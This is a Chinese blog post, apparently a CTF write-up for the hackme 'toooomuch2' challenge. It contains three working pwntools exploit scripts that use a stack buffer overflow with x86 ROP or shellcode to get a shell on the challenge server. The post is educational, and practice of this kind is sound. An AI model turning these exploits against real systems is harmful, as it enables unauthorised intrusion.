hackme pwn toomuch2 [buffer overflow + ROPx86]

最新推荐文章于 2021-01-09 23:40:58 发布
最新推荐文章于 2021-01-09 23:40:58 发布
阅读量353 收藏
点赞数
分类专栏: hackme CTF之旅 pwn
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/kevin66654/article/details/86667533
版权
CTF之旅 同时被 3 个专栏收录
84 篇文章 3 订阅
订阅专栏
pwn
33 篇文章 1 订阅
订阅专栏
hackme
9 篇文章 0 订阅
订阅专栏

checksec一下,发现啥保护也没有,不需要再找libc的版本了

这里的漏洞点在toomuch1中说过了

在toooomuch函数中,覆盖0x18+4个值,即可达到溢出效果

下一步目标是:将"/bin/sh"写入bss段中,然后执行system函数即可

类似x64平台,在x86中也有相似的通用gadgets

exp1:

利用gets+system:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))

pr = 0x804889B
system_plt = 0x080484C0
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system_plt) + p32(pr) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()

exp2:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

#io = process("./toooomuch")
io = remote("hackme.inndy.tw", 7702)
elf = ELF("./toooomuch")
gets = elf.symbols['gets']
log.info("gets_addr = " + str(hex(gets)))
bss = elf.bss()
log.info("bss_addr = " + str(hex(bss)))

pr = 0x804889B
system = 0x8048649
payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(pr) + p32(bss)
payload += p32(system) + p32(bss) + p32(0xABCD)
io.sendline(payload)
sleep(1)
io.sendline("/bin/sh\x00")
io.interactive()

分析一下:

exp1和exp2的不同点:exp1中,调用的是system_plt,没有pop—ret指令,即没有返回地址,所以要自己构造

exp2中,调用的是函数中的对system的调用,之后有pop和retn,即有恢复堆栈

单步调试即可看到区别

 

exp3:

#!/usr/bin/env python
# coding=utf-8

from pwn import *

elf = ELF("./toooomuch")

io = remote("hackme.inndy.tw", 7702)
gets = elf.symbols['gets']
bss = elf.bss()
log.info("gets addr = " + str(hex(gets)))
log.info("bss addr = " + str(hex(bss)))

payload = "A" * 0x18 + "B" * 4
payload += p32(gets) + p32(bss) + p32(bss)
io.recvuntil("passcode: ")
io.sendline(payload)
io.sendline(asm(shellcraft.sh()))
io.interactive()
Flying_Fatty
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
CTF+pwn+nc(windows)+链接靶机
06-10
我们经常在打pwn的时候可能要用到我们的nc,一般我们要打开虚拟机,加入我们本机有一个nc就会方便很多
pwn2own2020:通过链接六个漏洞通过Safari破坏macOS内核
02-04
通过链接六个漏洞通过Safari破坏macOS内核 总览 该存储库包含利用和技术细节,并。 有关更多信息,您还可以查看。 该存储库还包括成功利用。 如何繁殖 ... ... 通过Safari使用攻击者服务器的IP访问网站: ...
hackme pwn toomuch1 - buffer overflow
ACdream
01-23 308
一开始看到这个漏洞还是蛮明显的~ 这里s的长度只有0x18个字节,然后用的是gets和strcpy来输入和传递,意味着没有长度限制与安全检查,所以可以直接缓冲区溢出来覆盖函数返回地址 返回地址在ebp + 4,这里是ebp - 18 中间的填充值也就好算了~和homework一样,这里有现成的函数重用 代码如下: #!/usr/bin/env python # coding=utf...
toooomuch和toooomuch2的wp
一个码农的笔记
12-13 3402
https://hackme.inndy.tw/scoreboard/ 题目很有趣,我做了toooomuch这个题目感觉还不错,我把wp分享出来,方便大家学习 toooomuch的题目要求是: nc hackme.inndy.tw 7702Can you pass the game?这个题目是一个二分猜测题目,很简单,passcode是硬编码在binary里面的 toooomuch-2的题目
硬核二进制安全学习:Buffer Overflow(栈的缓冲区溢出&&Pwn技巧Return to Text)
「鸿渐之翼」的博客
01-09 1721
前言: 我喜欢讲本质的东西,也许用处不一定大,希望我的“硬核二进制学习”系列文章能给你带来一些启迪,二进制安全的路虽然艰苦,只想为你分享我程序生涯的点点滴滴。 我是CSDN博主鸿渐之翼,文章有许多不足之处,欢迎各位学者专家指正批评。 点赞????+收藏+关注 上期文章:添加链接描述 NTUSTISC Pwn basic 台湾科技大学 Buffer Overflow: ...
攻防世界PWN之bufoverflow_b题解
seaaseesa的博客
02-19 761
bufoverflow_b 这题和bufferoverflow_a类似,只是在输入的时候,增加了一个检查 遇到空字符就会截断,这将不利于我们在chunk里伪造数据。 另外增加了一个功能,不过我没有使用到。 遇到’\x00’就会截断,但是我们仍然可以完整的把我们的伪造数据放进去。 比如,我们要在偏移0x30处写一个数据0x0000000000123456,我们先把0x30处的8字节...
hackme pwn toomuch1 - 二分法解题
ACdream
01-23 236
分析函数流程: 首先是密码正确性判断,然后是玩游戏~ 第一关:43210 典型的二分法猜数字:0~100的区间,有8次机会! 2^8=256>100,次数足够了 第一次猜50,大了就说明数字在0~49中,则猜25;小了就说明数字在51~99中,则猜75;最后得到结果,即得到fake_flag (fake_flag是这个题的第一关) 截图如下: 这里运气比较好,...
pwn07.ret2syscall例题
11-11
ret2syscall例题
pwn入门题目+exp
01-26
初级的ROP,附有完整exp,可以学一下
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat
最新发布
04-17
arm32 android版pwn-level6二进制文件+gdbserver+lldb+socat,文章pwn - 零基础ROP之Android ARM 32位篇(新修订)https://blog.csdn.net/tabactivity/article/details/137780714 全部资料文件。...0基础pwn
CTF-rootme 题解之ELF - 0 protection && ELF - x86 Basic
weixin_30740295的博客
02-26 488
题目入口: https://www.root-me.org/en/Challenges/Cracking/ELF-0-protection https://www.root-me.org/en/Challenges/Cracking/ELF-x86-Basic crack-bin: http://challenge01.root-me.org/cracking/ch1/ch1.zip h...
「SeedLab」SeedLab-StackOverFlow-Seed实验专题
Black coder
11-29 1316
SeedLab-StackOverFlow-Seed实验专题
root_me_stack_buffer_overflow_basic
doudoudedi
08-10 466
ARM pwn简单的栈溢出,就是环境搭建的问题 调试出偏移0xa4,发现啥保护没有开,还泄漏了栈地址,就直接ret2shellcode了 from pwn import * #p=process(qemu-arm -g 1234 -L /usr/arm-linux-gnueabihf/ ./root_me_stack_buffer_overflow_basiac"]) p=remote("node3.buuoj.cn",27876) p.sendlineafter('Give me data to dump
缓冲区溢出(buffer overflow)避免方法
热门推荐
刘一凡的博客
07-24 3万+
什么是缓冲区溢出? copy数据进buffer时,数据长度超过buffer中的剩余空间。 缓冲区溢出的危害? 缓冲区溢出,结果随机,可能会导致程序功能不正常,也可能导致程序崩溃。如果受到影响的是其它功能,因为故障现象随机,所以问题通常很难定位。别有用心的攻击者还会利用缓冲区溢出缺陷,覆盖控制变量的内容,接管程序的运行。 详细来说: 读越界时,因为读取到错误的数据,所以可能导致功能不正常,...
pwn入门之二:缓冲溢出
jhycjhyc的专栏
10-23 893
pwn入门二:缓冲溢出     环境:cenos6.5 64位,安装了 gcc的32位编译库,cenos运行于文本模式,搭建方法见博文《pwn入门之一:搭建64位centos6.5虚拟机 》。   一、建立 test1.c,内容如下: #include <stdio.h> main() {   char a='a';   char b[10];   gets(b)...
gdb工具pwndbg与peda与gef
ACdream
02-07 1万+
在调试时有时候需要不同功能,在gdb下需要安装两个工具pwndbg和peda,可惜这两个不兼容 pwndbg在调试堆的数据结构时候很方便 peda在查找字符串等功能时方便 安装pwndbg: git clone https://github.com/pwndbg/pwndbg cd pwndbg ./setup.sh 安装peda: git clone https://git...
rot13加密解密
ACdream
02-15 7635
rot13加密解密小工具,python代码 def Upper(ch): if ch>='A' and ch<='Z': return True def Lower(ch): if ch>='a' and ch<='z': return True def rot13(s): flag = '' for i in s: if Upper(i) == True:
缓冲区溢出漏洞
ACdream
04-27 5520
这个也是很常见的一个漏洞,原理是在没有栈保护的时候(或者有Canary的值然后被我们泄露出来之后),我们可以覆盖掉栈帧的返回地址,然后控制函数流程,从而达到提权的目的。 以2017陕西省的比赛赛题pwn_box为例进行调试 缓冲区溢出一般发生在字符串的读取,因为没有做边界上的检查,会导致读取的字符数量可能大于程序中申请的数量,导致栈溢出 截图中可以看到,Password的地方有个
LibcSearcher
ACdream
02-14 4292
来自github的CTF工具 https://github.com/lieanu/LibcSearcher https://github.com/niklasb/libc-database 做pwn题时经常需要泄露libc中某些函数地址(如puts、write、gets等)来确定libc版本,然后根据版本和相对偏移计算system等函数地址,从而进行下一步 例题:基本ROP - ret2l...
ctfshow的pwn2
09-28
ctfshow的pwn2是一道2021年鹏城实验室的pwn题,该题目考查了libc-2.31.so下off-by-null的漏洞利用。根据提供的引用和引用,我们可以看到解题的步骤如下: 1. 首先,使用ls命令查看当前运行程序下的文件,找到flag...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值